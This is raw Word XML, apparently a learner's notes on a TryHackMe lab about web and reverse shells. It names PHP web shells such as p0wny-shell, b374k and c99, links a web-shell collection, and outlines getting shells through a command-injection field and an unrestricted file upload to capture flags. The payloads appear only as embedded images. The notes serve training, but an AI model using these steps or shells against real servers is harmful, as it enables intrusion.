        <w:t>Existing Web Shells Available Online</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614041C3" w14:textId="77777777" w:rsidR="003F04E1" w:rsidRPr="003F04E1" w:rsidRDefault="003F04E1" w:rsidP="003F04E1">
      <w:r w:rsidRPr="003F04E1">
        <w:t>The power of supported languages by the web servers can result in web shells with lots of functionality and avoid detection at the same time. Let's explore some of the most popular web shells that can be found online </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7927CE8C" w14:textId="06278C35" w:rsidR="003F04E1" w:rsidRDefault="003F04E1" w:rsidP="003F04E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId28" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="003F04E1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>p0wny-shell</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003F04E1">
        <w:t> - A minimalistic single-file PHP web shell that allows remote command execution</w:t>
      </w:r>
      <w:r w:rsidR="00B150FC" w:rsidRPr="00B150FC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="363A87C6" wp14:editId="05FB713A">
            <wp:extent cx="5731510" cy="3974465"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="176593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33441" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3974465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08429DA4" w14:textId="2B1E1EDF" w:rsidR="00D64CF1" w:rsidRDefault="00D64CF1" w:rsidP="003F04E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId30" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00D64CF1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>b374k shell</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D64CF1">
        <w:t> - A more feature-rich PHP web shell with file management and command execution, among other functionalities.</w:t>
      </w:r>
      <w:r w:rsidR="004267A0" w:rsidRPr="004267A0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004267A0" w:rsidRPr="004267A0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77C4936E" wp14:editId="3B17FE1E">
            <wp:extent cx="5731510" cy="2273935"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="208005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59128" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2273935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D06BF3" w14:textId="1DC18648" w:rsidR="000E65F4" w:rsidRDefault="000E65F4" w:rsidP="003F04E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId32" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="000E65F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>c99 shell</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000E65F4">
        <w:t> - A well-known and robust PHP web shell with extensive functionality</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BB6FE1" w:rsidRPr="00BB6FE1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB6FE1" w:rsidRPr="00BB6FE1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ED4E1A2" wp14:editId="65A7C709">
            <wp:extent cx="5731510" cy="2437130"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="86130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06288" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2437130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCD3AD7" w14:textId="17C3DAFA" w:rsidR="008563F0" w:rsidRDefault="008563F0" w:rsidP="008563F0">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="008563F0">
        <w:t>You can find more web shells at: </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="008563F0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.r57shell.net/index.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008563F0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163F0F54" w14:textId="57043F78" w:rsidR="00221F33" w:rsidRDefault="00221F33" w:rsidP="00221F33">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00221F33">
        <w:t>Practical Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1173AD5F" w14:textId="77777777" w:rsidR="00221F33" w:rsidRPr="00221F33" w:rsidRDefault="00221F33" w:rsidP="00221F33">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00221F33">
        <w:t>Now that we have learned about the different types of reverse shells, let's test our knowledge with a practical exercise, and let's get the flag in the format THM{} from the vulnerable web server. Click on the Start Machine button to start the challenge. After that, it will be accessible on the following URLs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCEDFEB" w14:textId="77777777" w:rsidR="00221F33" w:rsidRPr="00221F33" w:rsidRDefault="00221F33" w:rsidP="00221F33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00221F33">
        <w:t>MACHINE_IP:8080 hosts the landing page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2470FC03" w14:textId="77777777" w:rsidR="00221F33" w:rsidRPr="00221F33" w:rsidRDefault="00221F33" w:rsidP="00221F33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00221F33">
        <w:t>MACHINE_IP:8081 hosts the web application that is vulnerable to command injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D80B710" w14:textId="77777777" w:rsidR="00221F33" w:rsidRPr="00221F33" w:rsidRDefault="00221F33" w:rsidP="00221F33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00221F33">
        <w:t>MACHINE_IP:8082 hosts the web application that is vulnerable to an unrestricted file upload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFBAE96" w14:textId="77777777" w:rsidR="00221F33" w:rsidRPr="00221F33" w:rsidRDefault="00221F33" w:rsidP="00221F33">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00221F33">
        <w:t>You can access the above using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00221F33">
        <w:t>AttackBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00221F33">
        <w:t>, which will display on a split screen, or you can use your own access through the VPN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B659F29" w14:textId="77777777" w:rsidR="00221F33" w:rsidRDefault="00221F33" w:rsidP="00221F33">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00221F33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note: </w:t>
      </w:r>
      <w:r w:rsidRPr="00221F33">
        <w:t>Please allow 2 minutes for the VM to fully boot up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4842E9" w14:textId="0725AB20" w:rsidR="000D62A2" w:rsidRDefault="000D62A2" w:rsidP="00221F33">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="000D62A2">
        <w:lastRenderedPageBreak/>
        <w:t>Using a reverse or bind shell, exploit the command injection vulnerability to get a shell. What is the content of the flag saved in the / directory?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116440AD" w14:textId="141E587E" w:rsidR="0053251B" w:rsidRDefault="0053251B" w:rsidP="00221F33">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step1: Setting up the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  for listening in attackers system</w:t>
      </w:r>
      <w:r w:rsidR="007E0243">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005B7D7B" w:rsidRPr="005B7D7B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005B7D7B" w:rsidRPr="008C0BA6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1395FF27" wp14:editId="0E1D2BD4">
            <wp:extent cx="5731510" cy="1412240"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="53745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52890" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1412240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="797C222A" w14:textId="4B77978B" w:rsidR="008C0BA6" w:rsidRPr="008C0BA6" w:rsidRDefault="008C0BA6" w:rsidP="008C0BA6">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="008C0BA6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Replace the placeholders</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0BA6">
        <w:t xml:space="preserve"> in a payload with </w:t>
      </w:r>
      <w:r w:rsidRPr="008C0BA6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>your real IP</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0BA6">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="008C0BA6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>the port</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0BA6">
        <w:t xml:space="preserve"> you chose above.</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0BA6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A379CB2" w14:textId="230E8328" w:rsidR="008C0BA6" w:rsidRDefault="008C0BA6" w:rsidP="008C0BA6">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C0BA6">
        <w:t xml:space="preserve">Your IP on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C0BA6">
        <w:t>TryHackMe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C0BA6">
        <w:t xml:space="preserve"> is usually the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C0BA6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AttackBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C0BA6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> IP</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0BA6">
        <w:t xml:space="preserve"> (10.10.x.x range) — you can find it with:</w:t>
      </w:r>
      <w:r w:rsidR="00DD6104" w:rsidRPr="00DD6104">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD6104" w:rsidRPr="00DD6104">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7786AC34" wp14:editId="2B4E1FE7">
            <wp:extent cx="5731510" cy="2461260"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="95097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78964" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2461260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3D1D26" w14:textId="2E2B5B69" w:rsidR="008D35DC" w:rsidRDefault="00A53E73" w:rsidP="008C0BA6">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00A53E73">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47F5C15B" wp14:editId="1D1F5D50">
            <wp:extent cx="5731510" cy="2660650"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="33224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46936" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2660650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00A53E73">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C0A7889" wp14:editId="688BF324">
            <wp:extent cx="5731510" cy="2759710"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="213848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87853" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2759710"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0091620C" w:rsidRPr="0091620C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="505E8AD5" wp14:editId="32056BD3">
            <wp:extent cx="5731510" cy="845820"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="40843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32715" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="845820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2802A7" w14:textId="049FB29A" w:rsidR="0091620C" w:rsidRPr="0091620C" w:rsidRDefault="0091620C" w:rsidP="0091620C">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="0091620C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="0091620C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Paste the payload</w:t>
      </w:r>
      <w:r w:rsidRPr="0091620C">
        <w:t xml:space="preserve"> into the vulnerable field / command execution point / uploaded file / whatever the lab gives you (e.g. command injection box, vulnerable web app parameter, file upload that executes PHP/asp, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFAA260" w14:textId="24ADD7F2" w:rsidR="0091620C" w:rsidRPr="0091620C" w:rsidRDefault="0091620C" w:rsidP="0091620C">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="0091620C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0091620C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>If you get a connection</w:t>
      </w:r>
      <w:r w:rsidRPr="0091620C">
        <w:t xml:space="preserve"> → you should see a shell appear in your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0091620C">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0091620C">
        <w:t xml:space="preserve"> listener.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8B0C1E" w14:textId="101C4C89" w:rsidR="0091620C" w:rsidRDefault="0091620C" w:rsidP="008C0BA6">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="0091620C">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28B0EA6E" wp14:editId="193A6675">
            <wp:extent cx="5731510" cy="1524635"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="181572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23263" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1524635"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1786B954" w14:textId="4D5EC425" w:rsidR="009B2509" w:rsidRDefault="009B2509" w:rsidP="008C0BA6">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>The flag in the root directory.</w:t>
      </w:r>
      <w:r w:rsidR="00EB21CC" w:rsidRPr="00EB21CC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EB21CC" w:rsidRPr="00EB21CC">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57232D54" wp14:editId="024C4E81">
            <wp:extent cx="5731510" cy="3009900"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2559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2085" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3009900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="005D172C" w:rsidRPr="005D172C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48A116DF" wp14:editId="5C88541E">
            <wp:extent cx="5731510" cy="2797175"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="122054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49266" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2797175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="005D172C" w:rsidRPr="005D172C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C5B4DC7" wp14:editId="5E19C938">
            <wp:extent cx="5731510" cy="2288540"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="5310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6402" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2288540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="009D0598" w:rsidRPr="009D0598">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4797AA70" wp14:editId="33AF963D">
            <wp:extent cx="5731510" cy="443230"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="161459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96328" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="443230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC30C12" w14:textId="77777777" w:rsidR="008A3727" w:rsidRDefault="008A3727" w:rsidP="008C0BA6">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EB31E32" w14:textId="77777777" w:rsidR="00930D0B" w:rsidRDefault="008A3727" w:rsidP="008C0BA6">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3727">
        <w:t>Using a web shell, exploit the unrestricted file upload vulnerability and get a shell. What is the content of the flag saved in the / directory?</w:t>
      </w:r>
      <w:r w:rsidR="0060100A" w:rsidRPr="0060100A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0060100A" w:rsidRPr="0060100A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A1052A2" wp14:editId="4E6EE357">
            <wp:extent cx="5731510" cy="2610485"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="123012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27982" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2610485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00BD4BF8" w:rsidRPr="00BD4BF8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B48F4B6" wp14:editId="745277C1">
            <wp:extent cx="5731510" cy="2616200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="187580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00899" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2616200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00E11A1F" w:rsidRPr="00E11A1F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6920D1B6" wp14:editId="05BA0DC2">
            <wp:extent cx="5731510" cy="2256155"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="19477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9451" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2256155"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00E11A1F" w:rsidRPr="00E11A1F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14B86401" wp14:editId="017BA2BE">
            <wp:extent cx="5731510" cy="2613025"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
